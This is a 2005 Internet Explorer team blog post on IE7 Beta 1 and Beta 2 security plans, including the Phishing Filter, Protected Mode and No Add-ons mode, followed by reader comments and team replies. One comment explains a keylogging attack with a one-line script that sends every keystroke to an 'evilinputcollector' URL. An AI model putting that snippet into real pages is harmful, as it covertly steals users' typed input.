Security strategy for IE7: Beta 1 overview, Beta 2 preview

Security as a feature can be hard to measure. I
want to provide some insight into our security strategy so our customers and
partners can understand the direction we’re heading with Beta 1 and beyond to
Beta 2. All of the work the IE security team has done for IE7 is designed to
make you safer while you browse. While some of our work is front and center
like the Phishing Filter, a lot of the features are “under the hood” like
Low-rights IE and we hope you will never see them, just know that they are
there protecting you.

We started out designing the new security changes
for IE7 by understanding the risks or the "threats" that browsers
face from a malicious web site.  “Threat
modeling
” as we call it, is one part of the
Security Development Lifecycle
and is really like performing a risk
evaluation to find, and then eliminate or mitigate, security threats in
software .

We found places where we can enhance security by
changing parts of IE’s architecture. Beta 1 includes powerful but mostly
invisible changes to how IE handles URLs and script in sensitive functions.
Those changes will continue forward in Beta 2 but we have established a major
beachhead in Beta 1 against these classes of vulnerabilities. You’ll be hearing
about these in posts coming soon from Eric and myself (Marc would post but he’s
on his honeymoon somewhere in the Caribbean). You may have already read some
about how Internet Explorer for Windows Vista will run in a new “Protected Mode
(formerly known as Low-rights IE) to help prevent malware from installing on a
user’s system through a vulnerability.

Powerful add-ons like ActiveX controls are part
of what make browsing such a rich experience but any extensibility can also
introduce threats to browser security. In IE7 Beta 1, you’ll be able to use IE
in “No Add-ons” mode. In Beta 2 we’ll continue to enhance the user interface
for “Manage Add-ons” to make it easy for users to be in control of Add-ons. We
know that our user base depends on the rich scenarios that they get with
Add-ons. Our goal is to help users take control of important decisions while
maintaining a rich, consistent, easy-to-use experience.

There’s also a threat that a malicious web site
will try to trick you into letting it do something dangerous. The most
upsetting example of this is the recent epidemic scam-tactic known as “phishing”.
The scam usually starts with a bogus email that urges the victim to visit to a
fake banking site. After the victim visits the site and enters their password,
the site uses it to steal money from the victim account. Tariq from my team
will be telling you about how we built a Phishing Filter to fight back against
this threat. The Phishing Filter will be able to take you away from a reported
phishing site but, even if a site hasn’t been reported yet, Internet Explorer
will warn you about sites that might look a “little bit phishy” because they
use some features commonly used on phishing sites. We want your feedback on how
the Phishing Filter performs and Tariq will tell you how to submit feedback
directly through the UI. We’ve also made it easier to check the lock icon for
legitimate banking and secure sites. Eric will tell you more about that. We’ll
continue to improve the user interface in Beta 2 with additional features to
make security decisions easier.

We believe that security is never done but that
we can make a huge difference in this release. We’re proud that we get to
tackle these threats head-on in IE7. We’re hoping for lots of feedback from the
security and developer communities - we want to make sure IE7 is rock solid. As
always, if you find a vulnerability, please report it
responsibly
, this helps protect the other people like you working with us
on this beta.

- Rob Franco

Comments

  • Anonymous
    January 01, 2003
    The IE Blog is on a roll!

    Some very cool stuff is talked about, mainly security in Internet Explorer...

  • Anonymous
    January 01, 2003
    “little bit phishy” -- I hope you keep that exact phrase when waring the user!

    / ATTENTION!
    / ! Microsoft Internet Explorer
    ----- believes this page to be
    a little bit phishy! Do not
    trust it!

  • Anonymous
    January 01, 2003
    "we hope you will never see them, just know that they are there protecting you."

    So, big brother is there, you just can't see him...

    Honestly I think this is a bad idea. When you have 90% of people using your operating system and provided software (IE), you have a huge responsibility. Dumbing down the features or making them hard to find isn't helping anyone in the long-term. 85% of those users who use your software often are complete computer novices. They have no idea what "phishing" is and why your software tries to prevent it. The best route is to either put all of the features into a neatly arranged menu or leave it like it is and provide a very user-friendly help file.

  • Anonymous
    January 01, 2003
    If security really is a concern, then please, please, PLEASE make it so the phishing detector does not "phone home" to Microsoft. The second I read that that is how it works, I turned it off - and I can assure you that many other will too. My browsing is nobody's business. Microsoft has no reason to be notified of the sites I visit and I'm sure this will be the general consensus among users. To be honest, there really is no difference between this and spyware. Many spyware claim to be providing security and enhancement features, many spyware claim to not sell your information, but how do we know? For all I know, Microsoft will be selling my browsing history to marketing companies. Therefore, I turned the phishing detection off. I'd rather have a "possible" security breach by being baited to a bad site, rather than a "definite" security breach by sending my information to MS.

  • Anonymous
    January 01, 2003
    Speaking of security, will windows update work in Beta 2?

  • Anonymous
    January 01, 2003
    The "phone home" thing is indeed too evil, no matter how good your purposes are. Nobody is going to like it.

    The Right Thing (tm) IMO would be to include that functionality in Microsoft Spyware - a database (updated frequently) with all the "evil sites" so IE know what it has to block.

  • Anonymous
    January 01, 2003
    Codemastr: we take security and privacy to heart in all our features. Tariq will blog more details about the anti-phishing work we're doing later, but to answer your basic question: just like many Microsoft products (Windows Media Player, Windows Messenger, etc.) it is currently our plan to allow users to opt in our out of any feature that "phones home." The point of our Beta programs is to get feedback, so if you think we should change the defaults, etc., let us know what you think they should change to, and why!

    -Christopher [MSFT]

  • Anonymous
    January 01, 2003
    The comment has been removed

  • Anonymous
    January 01, 2003
    Jack, what I mean by "you'll never see them" is that some security improvements are infrastructure improvements and users won't need to "find them" as you suggest. For example, there won't be any UI for the architectural improvements to URL and script handling.
    More visible are features like the Phishing Filter and the interface for seeing SSL information. Your feedback here is dead-on: we want the UI for these features to be useful for every user. We have done usability testing on these features but the feedback on the beta will be important for us to get usability right.
    Rob [MSFT]

  • Anonymous
    January 01, 2003
    codemastr, you're right that the Phishing Filter checks a Microsoft server for known phishing sites. The reason it needs to check with a server this is that phishing attacks move around very quickly and the list of phishing sites has to be constantly updated. Automatically using the server lookup helps protect you automatically but you can also set the phishing filter to work manually. If you set phishing filter to work manually, you can control exactly when IE checks the server. As I just mentioned above, we need to make sure that users understand the UI for the phishing filter, the decision to use it and how to disable it if they choose. We'll go into a lot more detail about how this works in a post all about the Phishing Filter.

    Rob [MSFT]

  • Anonymous
    January 01, 2003
    I agree wholeheartedly with codemastr and Diego. A local database for the phishing filter is the way to go.

    Allowing users to opt-out of a server lookup simply mutes the effectiveness of this feature. It does nothing to address several good objections already raised here -- objections which would be met quite sufficiently by a local database.

  • Anonymous
    January 01, 2003
    Nice work on the redesign of the site - nice and clean.

  • Anonymous
    January 01, 2003
    The comment has been removed

  • Anonymous
    January 01, 2003
    The comment has been removed

  • Anonymous
    January 01, 2003
    The comment has been removed

  • Anonymous
    January 01, 2003
    I don't have a problem with it "phoning home" personally. I'm not exactly sure how a local database would even work... would it sync up every few hours or so? It might be difficult to keep the local copy relevant and up to date without forcing people to download too often. Also, I'm not sure how the current anti-phishing works (as I'm not an MSDN subscriber), but there's a lot to be said for more intelligent alogirthms for detecting phishing attacks in addition to site checking.

  • Anonymous
    January 01, 2003
    The comment has been removed

  • Anonymous
    January 01, 2003
    How does Low-Rights IE compare to simply running exe file with "Run as..." option using locked-down user account? Does Windows XP allow some uncontrollable privilege escalation of such programs? (through dll, or something?)

  • Anonymous
    January 01, 2003
    IE7 security changes: Rob Franco of Microsoft provides guidance on some of the security work being done in IE7. The first beta, now in private release, adds additional constraints on some uses of URLs and browser scripts. Rob also describes...

  • Anonymous
    January 01, 2003
    I've already come across a couple of sites that IE7 beta 1 has reported as being 'phishy'

    One was on xbox.com (eek!) and the other I can't remember now. I tried to submit both as "not suspiscious" but apparently "The Passport network is experiencing technical difficulties"

    I'll try again soon. And keep up the good work.

  • Anonymous
    January 01, 2003
    This is great news - absolutely. But if you take security so seriously, why are there so many unpatched security vulnerabilities in Internet Explorer? I would prefer getting these problems fixed before adding new security features ...

  • Anonymous
    January 01, 2003
    @MSFT people: Is there a similar Vista blog to this? As you can see blogging about next Microsoft products and activities brings a lot of attention and feedback. I think it would be great to have a general Vista blog (such as this one) for the same purpose.
    You should tell your boss about this :)

    Anyway, that's my 2 cents. Keep up the good work and happy honeymoon to Marc :)

  • Anonymous
    January 01, 2003
    The comment has been removed

  • Anonymous
    January 01, 2003
    The comment has been removed

  • Anonymous
    January 01, 2003
    One other thing: are you planning on exposing a public anti-phishing web service? It seems to me, working with everybody else, instead of locking it into Internet Explorer only, will share the work to maintain this database amongst many people, not leave it all up to you.

  • Anonymous
    January 01, 2003
    The comment has been removed

  • Anonymous
    January 01, 2003
    Great Blog and i really like the (new) openess of the IE-Team!

    Just one question: When can we expect the open beta of IE 7? I would like to try IE 7 too ;)

  • Anonymous
    January 01, 2003
    The comment has been removed

  • Anonymous
    January 01, 2003
    The feasibility of hashing urls depends entirely on the implementation though Will, if MS have implemented this as a huge database of exact urls that they just do a string comparison against, hashing would work fine..

    Either way, I don't see it happening as I'm sure the marketing/search/advertising departments are loving the idea of having browsing statistics reported to them.. cynical perhaps but I doubt I'm wrong

  • Anonymous
    January 01, 2003
    The comment has been removed

  • Anonymous
    January 01, 2003
    I have to say that I always thought the test "requires restart", meant a full on Windows restart. Is it really only a browser restart that this text refers too? If so, could I suggest a slight change in the wording, for clarification - such as "requires browser restart".

  • Anonymous
    January 01, 2003
    Chris: If so, could I suggest a slight change in the wording, for clarification - such as "requires browser restart".

    Or better yet, fix it so that you don't have to restart anything! :)

  • Anonymous
    January 01, 2003
    Is there any chance Beta 2 or final will allow total customization of every toolbar position? I myself prefer the File menu below the title bar.

    How about a confirmation (enabled by default and can be disabled) before closing multiple tabs?

    Nice work otherwise, looking forward to final.

  • Anonymous
    January 01, 2003
    The comment has been removed

  • Anonymous
    January 01, 2003
    The comment has been removed

  • Anonymous
    January 01, 2003
    WinXP/SP2 - Could this be called "Security Strategy"?!

    Dear Rob Franco an all in the IETeam,

    It seems to me that in WinXP/SP2 almost any HTML document ( including those residing in the local machine ) with Script is, by default, blocked and labeled as "pontentially dangerous"!!! This simply can not be called "security strategy"!!! This is rather an indication of a deep equivocation and, in fact, of a frank incapacity of distinguish beetween really malicious Scripts and well-intentioned and task-oriented ones. I simply can not understand why people do not feel them intelectually offended with such a detestable and incredible thing...

    Microsoft, wake up while there is time!!!

  • Anonymous
    January 01, 2003
    <<"requires browser restart". >>

    A good idea, although we're tight on space.

    <<Or better yet, fix it so that you don't have to restart anything!>>

    The problem there is that many of these settings really cannot be changed while the browser is running, because certain codepaths have already been executed. For instance, it doesn't really work to change "Enable 3rd party browser extensions" while the browser is running, because the extensions have already been loaded. Forcing unload would be equivalent to killing processes in Task manager.

    Overall, the expectation is that Advanced Settings are not often changed. If you find you're constantly switching one of these settings on and off, please let me know which one. Thanks!

  • Anonymous
    January 01, 2003
    I'm reading interesting article about subject: http://spaces.msn.com/members/eswanson/Blog/cns!1pdVO89fmNKwqmwfervd6IGg!964.entry.

    What IE Team think about it?
    IE 7.0 will prevent this vulnerability?

  • Anonymous
    January 01, 2003
    I wrote about the evil script detection problem here:

    http://blogs.msdn.com/ptorr/archive/2005/08/05/448007.aspx

  • Anonymous
    January 01, 2003
    Is it just me, or does HTML Help (chm) no longer work once IE7 is installed? The help files for several programs I use just return about:blank.

  • Anonymous
    January 01, 2003
    Well didn't take you long to fix the Windows Update problem - good work .

    Thomas

  • Anonymous
    January 01, 2003
    The issue that a server can look at your keystrokes when you type in the webpage has nothing to do with Ajax, although Ajax is one way of accomplishing the attack (see Google Suggest, for instance).

    If you have script enabled at all, you can perform this attack without using XMLHttp. You can simply do something like

    <body onkeypress="someimagetag.src='http://mysite.com/evilinputcollector.aspx?key='+window.event.keyCode;">

    And whammo, there you go.

  • Anonymous
    January 01, 2003
    2 EricLaw:

    Thanks, for your response. I had another question now (or suggestion):

    In IE Security Settings, i may enable/disable/prompt: Active scripting, Allow paste operation via script, Allow status bar updates via script. But i can't control sending information to server via script (without user interaction).

    Allow user to take a decision about this action (enable/disable/prompt - more than enough).

    What do you think?

  • Anonymous
    January 01, 2003
    The comment has been removed

  • Anonymous
    January 01, 2003
    The refresh button on IE is way too small, and it's out of the way. Maybe most users use the F5 key or something, but please make that button a little bigger.

  • Anonymous
    January 01, 2003
    Jack, I'll tackle a few of your questions:

    2) You asked about “No Add-ons mode” and possibly confusing the user. “No Add-ons mode” is currently intended as an advanced tool users might use in case of emergency. You are absolutely correct that not confusing users with it is critical.
    2a) Yes, you can use Windows Update in No Add-ons Mode, in fact No Add-ons mode has a special start page with a link to Windows Update. Getting a security update is one scenario when we expect people might want No Add-ons mode.
    2b) “No Add-ons mode” is a whole separate way to run IE, its not applied based on zone of the page you are visiting.
    3) I hear your feedback about the Phishing Filter. We’re working to earn and maintain your trust. More from Tariq soon.
    4,5,6 & 7) I hear you saying that silent download of ActiveX controls is a “threat” in any zone. Specifically, you might be talking about a scenario where a user lowers their security slider to “Low” and they get ActiveX controls installed on their machine. I agree, I think this is the kind of mistake that some folks make. I look forward to telling you more about how we’re improving the security UI in Beta 2 as soon as possible.


    KL, You asked about Low-rights IE compared to starting IE using “Run as…” a different user. That scenario is in fact conceptually similar to “Protected Mode” (formerly Low-rights IE) because it prevents IE from writing to certain sections of the file system. We’ll give you more details about Protected Mode as soon as possible.


    Marcus, you asked why XP SP2 puts the information bar on innocent HTML pages. First off, I'm glad to hear you aren't writing malicious pages! Since the HTML you write is "good", you might not need the all the power granted to HTML in the Local Machine Zone. By moving your HTML to another zone, you reduce its capability but you also will avoid getting the Information Bar.

    You can change the zone of a local HTML file to a less powerful zone simply by adding an HTML comment, called "mark of the web", that indicates the security zone you want to run in. This is a little extra effort for you but if your HTML doesn’t need that extra power, this is a safe choice. Here’s more info on Mark of the Web:

    http://msdn.microsoft.com/library/default.asp?url=/workshop/author/dhtml/overview/motw.asp

    As you know, you can still use powerful HTML in the Local Machine Zone by clicking on the information bar or by using one of the other workarounds for Local Machine Zone Lockdown:

    http://msdn.microsoft.com/security/productinfo/XPSP2/securebrowsing/lockdown_devimp.aspx

    Thanks folks for all of the feedback and good questions!
    Rob [MSFT]

  • Anonymous
    January 01, 2003
    The comment has been removed

  • Anonymous
    January 01, 2003
    Are there any plans to implement something similar to Shane Hird's suggestion?

    http://www.securityfocus.com/archive/1/391803

  • Anonymous
    January 01, 2003
    Internet Explorer 7 includes a new URL handling architecture known internally as CURI.&amp;nbsp; The new...

  • Anonymous
    January 01, 2003
    Where can I try this out as our students on campus are bound to intergrate this w/out our knowledge and I am sure I will need to "tech" it kmackles (the @) uh.edu

  • Anonymous
    January 01, 2003
    My last post was intended to introduce our overall security strategy and the specific features in IE7...

  • Anonymous
    January 01, 2003
    Hi, my name is Tariq Sharif and I am a Program Manager on the IE Security team. One of the threats users...

  • Anonymous
    March 15, 2006
    As we’ve described
    previously, we’ve made some major architectural improvements to improve browsing...

  • Anonymous
    March 17, 2006
    While Rob Franco and Chris Wilson were presenting and getting feedback at PDC, I spent most of my time...

  • Anonymous
    March 17, 2006
    Hello, I’m Marc Silbey,&amp;nbsp;a Program Manager focused on IE security. I’m back from my honeymoon and...

  • Anonymous
    June 26, 2006
    PingBack from http://adamstiles.com/2005/08/death_of_ie7_ph/

  • Anonymous
    December 23, 2006
    The comment has been removed

  • Anonymous
    June 06, 2008
    PingBack from http://thought.mobiforumz.com/2005/09/02/ie7-beta-chat-transcript-from-today/

  • Anonymous
    May 29, 2009
    PingBack from http://paidsurveyshub.info/story.php?title=ieblog-security-strategy-for-ie7-beta-1-overview-beta-2-preview

  • Anonymous
    June 07, 2009
    PingBack from http://besteyecreamsite.info/story.php?id=1446

  • Anonymous
    June 13, 2009
    PingBack from http://barstoolsite.info/story.php?id=1024

  • Anonymous
    June 15, 2009
    PingBack from http://einternetmarketingtools.info/story.php?id=8465